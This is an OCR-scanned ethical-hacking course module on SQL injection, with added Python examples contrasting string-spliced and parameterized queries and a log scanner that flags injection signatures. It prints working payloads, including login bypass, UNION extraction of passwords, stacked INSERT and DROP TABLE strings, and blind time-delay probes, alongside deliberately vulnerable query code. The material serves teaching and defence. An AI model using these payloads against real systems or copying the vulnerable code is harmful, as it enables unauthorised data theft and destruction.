
CEHv8 module 14 SQL injection

Document scanned with OCR; the content may be inaccurate.

Document information: 94 pages, 6.56 MB.

Contents


Page 1

Module 14: SQL Injection

Engineered by Hackers. Presented by Professionals.

Certified Ethical Hacker

Page 3

Bach Khoa Information Technology Academy

Module Objectives

- SQL Injection Attacks
- SQL Injection Detection
- Password Grabbing
- Evasion Techniques
- How to Defend Against SQL Injection

Page 5

SQL Injection

- SQL injection is the most common vulnerability on the Internet.
- It is a web application flaw, not a database or web server issue.
- Most programmers are still unaware of this threat.

Page 6

News item (fragment): "... the biggest identity theft case ever prosecuted ... sniffer software on the companies' servers to intercept credit card data ..."

Page 7

Page 8

SQL Injection Threats: spoofing identity, changing prices, attacks on the server, and destruction of data.

Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Page 9

SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database.

SQL injection is a basic attack used either to gain unauthorized access to a database or to retrieve information directly from the database.

Page 10

On the basis of the application used and the way it processes user-supplied data, SQL injection can be used to implement the attacks mentioned below:

- An attacker logs onto an application and gains administrative privileges.
- An attacker obtains sensitive information that is stored in the database.
- An attacker compromises the host OS.
- Attackers deface web pages, insert malicious content into the database, delete information, delete web pages, or alter the contents of a database.
- Attackers delete log or audit information that is stored in a database.

Page 12

Powerful server-side technologies like ASP.NET and database servers give developers a great deal of power, and that power can easily be exploited using SQL injection attacks.

All relational databases, including SQL Server, Oracle, IBM DB2, and MySQL, are susceptible to SQL injection attacks.

SQL injection attacks do not exploit a specific software vulnerability; instead they target applications that do not follow safe practices for accessing and manipulating data stored in a relational database.

Page 13

When a user provides information and clicks Submit, the browser submits a string to the web server that contains the user's credentials. This string is visible in the body of the HTTP request and is passed on to the SQL query at the database.

Login form shown on the slide (OCR repaired):

<form method=post action=cgi-bin/login>
Username: <input type=text name=username>
Password: <input type=password name=password>
</form>

Page 14

Example 1: Normal SQL Query

Web form http://juggyboy.com/BadLogin.aspx and its server-side code (BadLogin.aspx.cs):

private void cmdLogin_Click(object sender, System.EventArgs e) {
    // handler and control names (cmdLogin, txtUser) are not readable in the scan and are assumed
    string strCnx = "server=localhost;database=northwind;uid=sa;pwd=;";
    SqlConnection cnx = new SqlConnection(strCnx);
    cnx.Open();
    //This code is susceptible to SQL injection attacks
    string strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text +
                    "' AND Password='" + txtPassword.Text + "'";
    int intRecs;
    SqlCommand cmd = new SqlCommand(strQry, cnx);
    intRecs = (int) cmd.ExecuteScalar();
    if (intRecs > 0) {
        // a non-zero count authenticates the user (redirect code not readable in the scan)
    }
    cnx.Close();
}

Query built by the server-side code (BadLogin.aspx):

SELECT Count(*) FROM Users WHERE UserName='<user>' AND Password='<password>'

Page 15

Attacker input in the username field: blah' or 1=1 -- (code after the -- is now a comment)

Page 16

With that input and an empty password, the query becomes:

SELECT Count(*) FROM Users WHERE UserName='blah' or 1=1 --' AND Password=''

Because a pair of hyphens designates the beginning of a comment in SQL, the query simply becomes:

SELECT Count(*) FROM Users WHERE UserName='blah' or 1=1

The count is non-zero, so the user is authenticated and redirected.

Page 17

Example 2: Product Filter

This page displays products from the Northwind database and allows users to filter the resulting list of products using a textbox called txtFilter. Like the previous example, this code is vulnerable to SQL injection attacks: the executed SQL is constructed dynamically from user-supplied input.

private void cmdFilter_Click(object sender, System.EventArgs e) {
    dgrProducts.CurrentPageIndex = 0;
    bindDataGrid();
}

private void bindDataGrid() {
    dgrProducts.DataSource = createDataView();
    dgrProducts.DataBind();
}

private DataView createDataView() {
    string strCnx = "server=localhost;uid=sa;pwd=;database=northwind;";
    string strSQL = "SELECT ProductId, ProductName, " +
                    "QuantityPerUnit, UnitPrice FROM Products";
    //This code is susceptible to SQL injection attacks
    if (txtFilter.Text.Length > 0) {
        strSQL += " WHERE ProductName LIKE '" + txtFilter.Text + "'";
    }
    SqlConnection cnx = new SqlConnection(strCnx);
    SqlDataAdapter sda = new SqlDataAdapter(strSQL, cnx);
    // the fill and return steps are not readable in the scan; standard ADO.NET usage assumed
    DataTable dtProducts = new DataTable();
    sda.Fill(dtProducts);
    return dtProducts.DefaultView;
}

Page 18

When the attacker enters blah' UNION Select 0, username, password, 0 from users in the filter textbox, user names and passwords are displayed in the product grid.

SQL Query Executed:

SELECT ProductId, ProductName, QuantityPerUnit, UnitPrice FROM Products WHERE
ProductName LIKE 'blah' UNION Select 0, username, password, 0 from users

Page 19
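Added example, not from the slides or the CEH courseware: the two query-building patterns of Example 1 (login count) and Example 2 (product filter) reproduced in Python against an in-memory SQLite stand-in for the Northwind tables, each beside its parameterized form, so the bypass and UNION inputs shown above can be checked directly. The table contents, column names and the use of the sqlite3 driver are this example's own assumptions.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the slides' Northwind Users and Products tables
    cnx = sqlite3.connect(":memory:")
    cnx.executescript("""
        CREATE TABLE Users (UserName TEXT, Password TEXT);
        INSERT INTO Users VALUES ('alice', 's3cret');
        CREATE TABLE Products (ProductId INTEGER, ProductName TEXT,
                               QuantityPerUnit TEXT, UnitPrice REAL);
        INSERT INTO Products VALUES (1, 'Chai', '10 boxes', 18.0);
    """)
    return cnx

def bad_login(cnx, user, password):
    # Same string splicing as BadLogin.aspx.cs: the input becomes part of the SQL text,
    # so a quote plus "or 1=1 --" rewrites the WHERE clause and comments out the rest.
    qry = ("SELECT Count(*) FROM Users WHERE UserName='" + user
           + "' AND Password='" + password + "'")
    return cnx.execute(qry).fetchone()[0]

def good_login(cnx, user, password):
    # Parameterized form: values travel separately from the statement and are never parsed as SQL.
    qry = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    return cnx.execute(qry, (user, password)).fetchone()[0]

def bad_filter(cnx, text):
    # Same pattern as createDataView(): the filter text is appended inside a LIKE literal,
    # so a four-column UNION SELECT pulls Users rows into the product listing.
    qry = "SELECT ProductId, ProductName, QuantityPerUnit, UnitPrice FROM Products"
    if text:
        qry += " WHERE ProductName LIKE '" + text + "'"
    return cnx.execute(qry).fetchall()

def good_filter(cnx, text):
    # Parameterized form: the whole input is matched as a single LIKE pattern.
    qry = "SELECT ProductId, ProductName, QuantityPerUnit, UnitPrice FROM Products"
    if text:
        return cnx.execute(qry + " WHERE ProductName LIKE ?", (text,)).fetchall()
    return cnx.execute(qry).fetchall()

if __name__ == "__main__":
    db = make_db()
    bypass = "blah' or 1=1 --"
    union = "blah' UNION Select 0, username, password, 0 from users --"
    print(bad_login(db, bypass, ""), good_login(db, bypass, ""))
    print(bad_filter(db, union), good_filter(db, union))
```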

Figure: an attacker launching SQL injection against the "forgot password" form of a vulnerable website (field: Email Address; message: "Your password will be sent to your registered email address").

Page 20

In the same "forgot password" form (Email Address: "Your password will be sent to your registered email address"), the attacker submits an email value that closes the string literal and appends an INSERT statement.

SQL Query Executed:

SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members
WHERE email = 'blah'; INSERT INTO jb-customers ('jb-email','jb-passwd','jb-login_id','jb-last_name') VALUES ('jason@springfield.com','hello','jason','jason springfield');--';

Page 21

The query behind the form (truncated on the slide):

SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM table WHERE jb-email =

Page 22


Page 24

SQL Injection Methodology (steps as labelled on the slide):

STEP 1: Check if the web application connects to a Database Server in order to access some data.
STEP 3: Attempt to inject codes into the input fields to generate an error.
STEP 4: Try to insert a string value where a number is expected in the input field.
STEP 5: The UNION operator is used to combine the result-set of two or more SELECT statements.
STEP 6: Detailed error messages provide a wealth of information to an attacker in order to execute SQL injection.

Page 25

Attempt to inject codes into the input fields to generate an error, using characters such as the single quote ('), semicolon (;), comments (--), AND, and OR. A vulnerable page returns a database error such as:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string

Try to insert a string value where a number is expected in the input field (for example /visa/credit.aspx):

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value to a column of data type int

Page 26

SQL injection characters:

Character                  Description
+                          Addition, concatenate (or space in URL)
||                         (Double pipe) concatenate
%                          Wildcard attribute indicator
?Param1=foo&Param2=bar     URL parameters
PRINT                      Useful as non-transactional command
@variable                  Local variable
@@variable                 Global variable
waitfor delay '0:0:10'     Time delay
@@version                  Displays SQL server version

Page 27

Method 1: Function Testing
- This testing falls within the scope of black box testing, and as such should require no knowledge of the inner design of the code or logic.
- Example requests: http://juggyboy/?parameter=123 and http://juggyboy/?parameter=1

Method 2: Fuzz Testing
- Inputting massive amounts of random data and observing the changes in the output.

Method 3: Static/Dynamic Testing

Page 28

- Send single quotes as the input data to catch instances where the user input is not sanitized.
- Send double quotes as the input data to catch instances where the user input is not sanitized.
- Use the right square bracket (the ] character) as the input data to catch instances where the user input is used as part of a SQL identifier without any input sanitization.
- Send long strings of single quote characters (or right square brackets or double quotes). These max out the return values from the REPLACE and QUOTENAME functions and might truncate the command variable used to hold the SQL statement.
- Send long strings of junk data, just as you would send strings to detect buffer overruns; this action might throw SQL errors on the page.

Page 29

Testing for SQL Injection

Testing string: 1' or '1'='1
Variations: value' or '1'='2 ; 1' and '1'='2 ; 1' or 'ab'='a'+'b ; 1' or 'ab'='a''b

Testing string: '; [SQL Statement]; --
Variations: '; [SQL Statement]; # ; 1'; [SQL Statement]; --

Testing string: '; drop table users--

Testing string: admin' #

Page 30

Testing for SQL Injection (continued)

' union select * from users where login
'some'+'thing'
' OR 'something' like 'some%'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
'; EXEC ('SEL' + 'ECT
' or isnull(1/0) /*
'; drop table temp

Page 33

Types of SQL injection:

- System stored procedure: attackers exploit databases' stored procedures to perpetrate their attacks.
- UNION query: the "UNION SELECT" statement returns the union of the intended dataset with the target dataset, for example:
  SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
- End of line comment: after injecting code into a particular field, legitimate code that follows is nullified through usage of end-of-line comments.
- Illegal/logically incorrect query: an attacker may gain knowledge by injecting illegal/logically incorrect requests, learning injectable parameters, data types, names of tables, etc.
- Tautology: injecting statements that are always true so that queries always return results upon evaluation of a WHERE condition.

Page 34

Union SQL Injection, step by step (the injected part of each URL is blank on the slide):

- Extract Database Name: http://juggyboy.com/page.aspx?id=  ; [DB_NAME] returned from the server
- Extract Database Tables: http://juggyboy.com/page.aspx?id=  ; [EMPLOYEE_TABLE] returned from the server
- Extract 1st Field Data: http://juggyboy.com/page.aspx?id=  ; [FIELD 1 VALUE] returned from the server

Page 35

SQL Injection: Error Based

- Extract Database Name: Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int
- Extract 1st Database Table: Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int
- Extract 1st Table Column Name: Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a column of data type int
- Extract 1st Field of 1st Row (Data): Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type int

Page 37

Blind SQL Injection

- Blind SQL injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.
- Blind SQL injection is identical to a normal SQL injection except that when an attacker attempts to exploit an application, rather than seeing a useful error message, a generic custom page is displayed.
- This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

Page 38

Verbose error that a non-blind target would return: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the ...

Page 39

WAITFOR DELAY 'time' (seconds): this is just like sleep; it waits for the specified time and is a CPU-safe way to make the database wait. When errors are suppressed, the application shows only a generic page such as "We are unable to process your request. Please try back later."

Page 40

Boolean exploitation example (MySQL syntax):

/?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),1,1))=97,555,777)

This tests whether the first character of the first password is "a" (ASCII 97); the attacker then repeats the test for the second character, and so on.

Page 41

Blind SQL injection with WAITFOR DELAY (the comparison values are blank on the slide except where noted):

Check for username length:
http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--

Check if the 1st character in the username is 'A' (a=97), 'B', or 'C', etc.:
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--

Check if the 2nd character in the username is 'A' (a=97), 'B', or 'C', etc.:
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:10'--

Check the 3rd character in the same way with substring((USER),3,1).
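Added example, not from the slides or the CEH courseware, from the defender's side of the material above: a small log scanner that decodes request query strings and flags the signatures this module catalogues (tautologies, comment terminators, UNION SELECT, stacked statements, and the WAITFOR DELAY / ASCII-substring probes of blind injection). The log format, the regular expressions and the sample log lines are this example's own constructions.

```python
import re
from urllib.parse import unquote_plus

# Signatures distilled from the probes on the slides; the patterns are this example's own
SIGNATURES = {
    "tautology":  re.compile(r"'\s*or\s+'?\w+'?\s*=\s*'?\w+'?", re.I),
    "comment":    re.compile(r"--|#|/\*"),
    "union":      re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "time_delay": re.compile(r"\bwaitfor\s+delay\b|\bsleep\s*\(|\bbenchmark\s*\(", re.I),
    "stacked":    re.compile(r";\s*(drop|insert|exec|if)\b", re.I),
    "char_probe": re.compile(r"\b(ascii|substring|mid|ord)\s*\(", re.I),
}

# Common Log Format: client ident user [time] "METHOD url proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def classify(query):
    """Return the set of signature names that match a decoded query string."""
    return {name for name, rx in SIGNATURES.items() if rx.search(query)}

def scan_log(text):
    """Return (client_ip, path, status, hits) for each request whose query string matches."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url, status = m.groups()
        path, _, qs = url.partition("?")
        hits = classify(unquote_plus(qs))  # decode %xx and '+' before matching
        if hits:
            findings.append((ip, path, int(status), hits))
    return findings

# Constructed sample log lines (not from any real server); the payloads mirror the slides
SAMPLE_LOG = """\
10.0.0.5 - - [14/Dec/2021:18:41:00 +0000] "GET /page.aspx?id=1;%20IF%20(LEN(USER)=1)%20WAITFOR%20DELAY%20'00:00:10'-- HTTP/1.1" 200 512
10.0.0.5 - - [14/Dec/2021:18:41:11 +0000] "GET /products.aspx?filter=blah'%20UNION%20Select%200,username,password,0%20from%20users-- HTTP/1.1" 200 2048
10.0.0.7 - - [14/Dec/2021:18:41:12 +0000] "GET /products.aspx?filter=Chai HTTP/1.1" 200 1024
10.0.0.9 - - [14/Dec/2021:18:41:30 +0000] "GET /login.aspx?user=blah'%20or%201=1%20-- HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A repeated time_delay or char_probe hit from one client against the same path, each request taking about ten seconds, is the server-side trace of the character-by-character extraction shown above.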


Posted: 14/12/2021, 18:41
